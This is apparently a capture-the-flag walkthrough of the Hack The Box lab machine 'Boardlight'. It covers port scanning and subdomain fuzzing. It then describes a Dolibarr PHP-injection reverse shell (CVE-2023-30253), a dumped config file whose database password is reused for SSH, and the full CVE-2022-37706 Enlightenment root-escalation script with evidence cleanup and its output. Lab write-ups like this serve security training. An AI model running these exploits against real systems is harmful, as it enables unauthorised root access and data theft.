Boardlight - Easy - Linux
Nmap Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Nmap 7.94SVN scan initiated Sun May 26 03:10:02 2024 as: nmap -sCV -p- -v -oN portscan.log 10.10.11.11
Nmap scan report for 10.10.11.11
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 26 03:10:27 2024 -- 1 IP address (1 host up) scanned in 25.41 seconds
Inspecting Port 80
Apache is hosting a static website on port 80. In the about footer there is an email address which has a domain board.htb.
Fuzzing VHOST
Using the domain name discovered in the previous step it was possible to find a subdomain of crm.board.htb via fuzzing.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/hackthebox/boardlight]
└─$ wfuzz -u http://10.10.11.11 -H 'Host: FUZZ.board.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hw 1053
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.11.11/
Total requests: 19966
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000072: 200 149 L 504 W 6360 Ch "crm"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
Total time: 0
Processed Requests: 2696
Filtered Requests: 2695
Requests/sec.: 0
Inspecting VHOST crm.board.htb
An application called Dolibarr is active on the apache virtual host. Its requesting authenication to proceed further.
Default Credentials
The default credentials of admin:admin worked and allowed access to the dashboard.
Exploiting Dolibarr 17.0.0 (CVE-2023-30253)
This version of the application is vulnerable to PHP code injection. There is a filter in place to prevent PHP code but its case sensitive. Simply capitalizing the text will bypass the filter.
Source: https://www.swascan.com/security-advisory-dolibarr-17-0-0/
Creating Website
Adding a new website via the dashboard.
Adding Page to Website
Adding page to the website via the dashboard with PHP code. The PHP code should curl a reverse shell payload and pipe it into bash. (Note: Adding the PHP code at this stage was incorrect and does nothing as I later found out.)
Adding Code to Page
Added the PHP payload again as this was the intented location to do so. Also made sure interactive page was checked so code is executed realtime.
HTTP Listener
Screenshots show a bash reverse shell payload being hosted on a python web server. GET request received from target with 200 code.
Reverse Shell Returned
Reverse shell returned as the www-data user.
Discovering DB Credentials
After searching the file system I eventually discovered the database configuration file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
cat conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';
//$dolibarr_main_demo='autologin,autopass';
// Security settings
$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_main_restrict_os_commands='mysqldump, mysql, pg_dump, pgrestore';
$dolibarr_nocsrfcheck='0';
$dolibarr_main_instance_unique_id='ef9a8f59524328e3c36894a9ff0562b5';
$dolibarr_mailing_limit_sendbyweb='0';
$dolibarr_mailing_limit_sendbycli='0';
//$dolibarr_lib_FPDF_PATH='';
//$dolibarr_lib_TCPDF_PATH='';
//$dolibarr_lib_FPDI_PATH='';
//$dolibarr_lib_TCPDI_PATH='';
//$dolibarr_lib_GEOIP_PATH='';
//$dolibarr_lib_NUSOAP_PATH='';
//$dolibarr_lib_ODTPHP_PATH='';
//$dolibarr_lib_ODTPHP_PATHTOPCLZIP='';
//$dolibarr_js_CKEDITOR='';
//$dolibarr_js_JQUERY='';
//$dolibarr_js_JQUERY_UI='';
//$dolibarr_font_DOL_DEFAULT_TTF='';
//$dolibarr_font_DOL_DEFAULT_TTF_BOLD='';
$dolibarr_main_distrib='standard';
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$
SSH - larissa
The database password worked and granted access to the larissa user.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali㉿kali)-[~/hackthebox/boardlight]
└─$ ssh larissa@board.htb
larissa@board.htb's password:
Last login: Sun Jun 9 04:30:27 2024 from 10.10.16.2
larissa@boardlight:~$ sudo -l
[sudo] password for larissa:
Sorry, user larissa may not run sudo on localhost.
larissa@boardlight:~$ ls -la
total 76
drwxr-x--- 15 larissa larissa 4096 May 17 01:04 .
drwxr-xr-x 3 root root 4096 May 17 01:04 ..
lrwxrwxrwx 1 root root 9 Sep 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 larissa larissa 220 Sep 17 2023 .bash_logout
-rw-r--r-- 1 larissa larissa 3771 Sep 17 2023 .bashrc
drwx------ 2 larissa larissa 4096 Jun 9 04:30 .cache
drwx------ 12 larissa larissa 4096 May 17 01:04 .config
drwxr-xr-x 2 larissa larissa 4096 May 17 01:04 Desktop
drwxr-xr-x 2 larissa larissa 4096 May 17 01:04 Documents
drwxr-xr-x 3 larissa larissa 4096 May 17 01:04 Downloads
drwxr-xr-x 3 larissa larissa 4096 May 17 01:04 .local
drwxr-xr-x 2 larissa larissa 4096 May 17 01:04 Music
lrwxrwxrwx 1 larissa larissa 9 Sep 18 2023 .mysql_history -> /dev/null
drwxr-xr-x 2 larissa larissa 4096 May 17 01:04 Pictures
-rw-r--r-- 1 larissa larissa 807 Sep 17 2023 .profile
drwxr-xr-x 2 larissa larissa 4096 May 17 01:04 Public
drwx------ 2 larissa larissa 4096 May 17 01:04 .run
drwx------ 2 larissa larissa 4096 May 17 01:04 .ssh
drwxr-xr-x 2 larissa larissa 4096 May 17 01:04 Templates
-rw-r----- 1 root larissa 33 Jun 8 05:26 user.txt
drwxr-xr-x 2 larissa larissa 4096 May 17 01:04 Videos
larissa@boardlight:~$
SUID Search
Larissa has no sudo access. A search for SUID binaries returned an interesting result. The enlightenment binaries are not default and stand out.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
larissa@boardlight:/opt$ find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
Exploiting Enlightement (CVE-2022-37706-LPE)
A quick google search returned a number of articles related to enlightenment. ExploitDB also had a POC.
Source: https://www.elastic.co/guide/en/security/current/potential-privilege-escalation-via-enlightenment.html
Source: https://www.exploit-db.com/exploits/51180
POC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/bash
# Idea by MaherAzzouz
# Development by nu11secur1ty
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
# The actual problem
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Welcome to the rabbit hole :)"
echo -e "If it is not found in fstab, big deal :D "
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
read -p "Press any key to clean the evedence..."
echo -e "Please wait... "
sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net
echo -e "Done; Everything is clear ;)"
Privilege Escalation - Success
The exploit worked and granted root permissions. Root flag captured.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
larissa@boardlight:/tmp$ bash exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Welcome to the rabbit hole :)
If it is not found in fstab, big deal :D
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
# cat /root/root.txt
718174bdfcdb66daefc29c0e03928036
#







